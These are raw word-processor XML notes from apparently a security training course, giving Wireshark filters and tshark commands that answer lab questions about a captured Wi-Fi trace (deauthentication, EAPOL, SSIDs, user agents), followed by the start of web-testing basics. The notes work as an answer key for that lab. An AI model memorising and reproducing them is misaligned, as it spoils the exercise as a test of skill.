    <w:p w14:paraId="051CE245" w14:textId="1D5C3656" w:rsidR="00B11D3C" w:rsidRDefault="004E606D" w:rsidP="00B11D3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Look for WPS tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9E7A9E" w14:textId="5892172B" w:rsidR="00D66C79" w:rsidRDefault="00D66C79" w:rsidP="008445ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D66C79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What is the total count of packets which were either transmitted or received by the device with MAC e8:de:27:16:87:18?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A866DD2" w14:textId="11447AB4" w:rsidR="004E606D" w:rsidRDefault="004E606D" w:rsidP="004E606D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E606D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(wlan.ta == e8:de:27:16:87:18) || (wlan.ra == e8:de:27:16:87:18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13143AE4" w14:textId="07495FB4" w:rsidR="009F00D2" w:rsidRPr="009F00D2" w:rsidRDefault="009F00D2" w:rsidP="009F00D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Look for packet count in the bottom right corner of the WS window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60084AF9" w14:textId="70C6D432" w:rsidR="00D66C79" w:rsidRDefault="003218F7" w:rsidP="008445ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003218F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What is the MAC address of the station which exchanged data packets with SSID 'SecurityTube_Open'?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08D323" w14:textId="721154FB" w:rsidR="0023762C" w:rsidRDefault="0023762C" w:rsidP="0023762C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“wlan contains SecurityTube”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146B6EDB" w14:textId="4D010A68" w:rsidR="009C1722" w:rsidRDefault="009C1722" w:rsidP="0023762C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Look under the beacon frame, specifically for “Transmitter address”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4270688F" w14:textId="61F33452" w:rsidR="009C1722" w:rsidRDefault="00265883" w:rsidP="0023762C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00265883">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>((wlan.bssid == e8:de:27:16:87:18) &amp;&amp; (wlan.fc.type_subtype == 0x0020))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7357148D" w14:textId="26380322" w:rsidR="00265883" w:rsidRDefault="004610BE" w:rsidP="0023762C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Look for the “Receiver address” this time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0CEE11" w14:textId="6732B72A" w:rsidR="003218F7" w:rsidRDefault="003218F7" w:rsidP="008445ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003218F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>From the last question, we know that a station was connected to SSID 'SecurityTube_Open'. Provide TSF timestamp of the association response sent from the access point to this station.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31982F6E" w14:textId="60FACAA7" w:rsidR="006E6E77" w:rsidRDefault="006E6E77" w:rsidP="006E6E77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00314E40" w:rsidRPr="00314E40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(((wlan.bssid == e8:de:27:16:87:18)) &amp;&amp; (wlan.addr == 5c:51:88:31:a0:3b)) &amp;&amp; (wlan.fc.type_subtype == 0x0001)</w:t>
      </w:r>
      <w:r w:rsidR="00314E40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB129EF" w14:textId="1E1FA573" w:rsidR="00314E40" w:rsidRDefault="006F2D28" w:rsidP="006E6E77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Under 802.11 radio information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E583515" w14:textId="77777777" w:rsidR="00E039E6" w:rsidRDefault="00E039E6" w:rsidP="00E039E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23543DA3" w14:textId="23E4480B" w:rsidR="00E039E6" w:rsidRDefault="00E039E6" w:rsidP="00E039E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Filtering Wi-Fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3593BF54" w14:textId="7AEFEAA0" w:rsidR="00716B61" w:rsidRDefault="00716B61" w:rsidP="00E039E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>These follow the questions prior, but for Tshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9EFC9" w14:textId="79E24BEC" w:rsidR="00E039E6" w:rsidRDefault="00153049" w:rsidP="00153049">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark</w:t>
      </w:r>
      <w:r w:rsidR="00210E1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r (PCAP FILE) -Y ‘wlan’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61158685" w14:textId="6F621700" w:rsidR="00210E1D" w:rsidRDefault="002C467E" w:rsidP="00153049">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="002C467E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tshark -r WiFi_traffic.pcap -Y 'wlan.fc.type_subtype==0x000c'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595E295" w14:textId="1E477506" w:rsidR="002C467E" w:rsidRDefault="002C467E" w:rsidP="002C467E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>0x000c represents deauthentication packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D671B67" w14:textId="0D5F2F36" w:rsidR="006A6CDF" w:rsidRDefault="006A6CDF" w:rsidP="006A6CDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tshark -r WiFi_traffic.pcap -Y 'eapol'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F62A28D" w14:textId="2E455F0A" w:rsidR="006A6CDF" w:rsidRDefault="006A6CDF" w:rsidP="006A6CDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“Standard CahFe Latte Attack WHAT THE FUCK DOES THAT EVEN MEA-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2273C770" w14:textId="73E409FE" w:rsidR="005550B4" w:rsidRDefault="004E0255" w:rsidP="005550B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0255">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tshark -r WiFi_traffic.pcap -Y 'wlan.fc.type_subtype==8' -Tfields -e wlan.ssid -e wlan.bssid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D242474" w14:textId="47FA257B" w:rsidR="004E0255" w:rsidRDefault="00DE59D6" w:rsidP="005550B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE59D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tshark -r WiFi_traffic.pcap -Y 'wlan.ssid==LazyArtists' -Tfields -e wlan.bssid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6393161F" w14:textId="75CC8D69" w:rsidR="00DE59D6" w:rsidRDefault="00AE7656" w:rsidP="005550B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tshark -r WiFi_traffic.pcap -Y 'wlan.ssid==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Home_Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>' -Tfields -e wlan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>radio.channel”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1859EF" w14:textId="779DE6FB" w:rsidR="00736A51" w:rsidRDefault="00736A51" w:rsidP="005550B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -r Wifi_traffic.pcap -Y ‘wlan.fc.type_subtype==0x000c’ -Tfields -e wlan.ra”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166F13E8" w14:textId="77450378" w:rsidR="00736A51" w:rsidRDefault="00383172" w:rsidP="005550B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009E0508" w:rsidRPr="009E0508">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tshark -r WiFi_traffic.pcap -Y '</w:t>
      </w:r>
      <w:r w:rsidR="009E0508">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wlan.ta==5c:51:88:31</w:t>
      </w:r>
      <w:r w:rsidR="006F4AEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:a0:3b &amp;&amp; http’ -Tfields -e http.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>user_agent”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D2C0B" w14:textId="4CA26F78" w:rsidR="00383172" w:rsidRDefault="00383172" w:rsidP="003D73A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4240AE7A" w14:textId="08A84BCA" w:rsidR="003D73A6" w:rsidRDefault="003D73A6" w:rsidP="003D73A6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WEB APP TESTING AND WEB/HTTP PROTOCOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB4837" w14:textId="77777777" w:rsidR="003D73A6" w:rsidRDefault="003D73A6" w:rsidP="003D73A6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FD6D39" w14:textId="3EE632E4" w:rsidR="003D73A6" w:rsidRDefault="00AF14A3" w:rsidP="00AF14A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Websites are pretty much just files on a server that are set to be public (and sometimes set to be private).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B11C5C" w14:textId="2EEBF9EE" w:rsidR="00AF14A3" w:rsidRDefault="00AF14A3" w:rsidP="00AF14A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Different scripting languages are utilized to build up different components</w:t>
      </w:r>
      <w:r w:rsidR="001E02DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, whether that be functional or physical</w:t>
      </w:r>
      <w:r w:rsidR="001E02DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452D15A" w14:textId="73407196" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0CEAC3" w14:textId="7FD408CD" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628451D" w14:textId="0260A830" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43995B0E" w14:textId="0B778042" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088EDD9E" w14:textId="78845446" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698ABF2F" w14:textId="766A64E9" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA6560" w14:textId="3244F010" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D4302" w14:textId="5ADF349D" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74873D33" w14:textId="7F0C8BB0" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Off-Premise Hosting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B6A91" w14:textId="4B029FA9" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
